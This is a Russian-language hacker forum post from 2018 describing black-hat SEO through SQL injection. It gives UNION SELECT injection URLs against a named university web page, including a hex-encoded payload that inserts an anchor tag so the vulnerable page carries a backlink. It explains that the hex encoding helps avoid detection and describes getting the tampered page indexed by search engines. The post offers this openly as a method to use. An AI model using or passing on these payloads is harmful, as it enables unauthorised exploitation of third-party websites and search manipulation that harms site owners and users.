Схемы | Статьи SQL inj в SEO или как нарастить пузомерки.

Тема в разделе "Полезные темы для читеров геймеров хакеров", создана пользователем Tema_zzz, 4 фев 2018.

  1. Tema_zzz
    ▪ SQL inj в SEO или как нарастить пузомерки.
    Доброго времени суток, уважаемые форумчане.

    В данном ликбезе, я попробую доступно объяснить как совместить эти, вроде бы разные вещи.

    Начнем, как обычно, с теории.

    SEO:

    Для увеличения ТиЦ и PR сайта, нужно иметь беки (ссылки на Ваш сайт) с авторитетных (и не очень) ресурсов, чем больше ссылок - тем больше пузо(мерки).

    Я надеюсь, что эти азы знает каждый, но на всякий случай:)

    SQL inj:

    С помощью атак такого рода злостные хакеры, то есть мы:), получают данные, находящиеся в базе SQL, для взлома сайта.

    Вы спросите, как это все связано? Очень просто, так как при sql-inj данные из базы выводятся на страницу, которая имеет свой собственный урл (хоть и с exploit'ом, но свой урл!), если данные выводятся на страницу, соответственно, они присутствуют в исходном коде этой страницы, а это же и есть пресловутый бек-линк!

    К примеру, мы имеем sql-inj на сайте, при этом выводится например поле №7, соответственно вместо поля мы можем прописать линк на нужный нам сайт и он окажется на этой странице.

    Дабы было меньше воды и больше дела я продемонстрирую:

    http://www.erskine.edu/library/newsfetcher.htm?igor=466+union+select+1,2,3,4,5--

    Как Вы можете видеть выводятся колонки 3 и 5 (в самом низу)

    Теперь изменим запрос

    http://www.erskine.edu/library/newsfetcher.htm?igor=466+union+select+1,2,0x3c6120 687265663d277777772e4e4143485f534149542e77734c4f4d 273e424f54205459542054454b4354204c494e4b27413c2f61 3e,4,5-- (не забудьте убирать пробелы из примеров)

    И что же Мы видим? Появился бек на наш сайт, как и положено, в теге и по феншую...

    По полочкам:

    3c6120687265663d277777772e4e4143485f534149542e7773 4c4f4d273e424f54205459542054454b4354204c494e4b2741 3c2f613e - это хекс вот этого: <a href='www.NACH_SAIT.wsLOM'>BOT TYT TEKCT LINK'A</a>, то есть самого обычного тега <a href>

    Почему хекс если можно просто вывести в '' (апострофах), потому что так мы меньше палимся перед поисковыми машинами, да и вывести в кавычках не всегда удается из-за пробелов.

    И так, Мы получили бек-линк, надо сообщить об этом поисковому роботу, тут уже вступает Ваша фантазия, кто-то добавляет через add-url поисковика (самое дебильное, что можно придумать), кто-то поступает умнее и выкладывает линк на эту страницу на ресурсе, чтобы при индексации ресурса робот перешел по ссылке и проиндексировал ее...
    Короче - кто на что горазд.

    После индексации этой страницы мы получаем бек, который будет с нами до прикрытия уязвимости.

    Ну вот, собственно и вся статейка...больно не пинайте, ибо первая она у меня:)

    Спасибо за внимание, с уважением, z0mbyak.

    P.S. Метод не мой, я его обнаружил в гугле(когда искал потенциально уязвимые сайты), на Русском, описания данного типа чероного СЕО, не встечал, только упоминание на eng.
     
    Albeshka нравится это.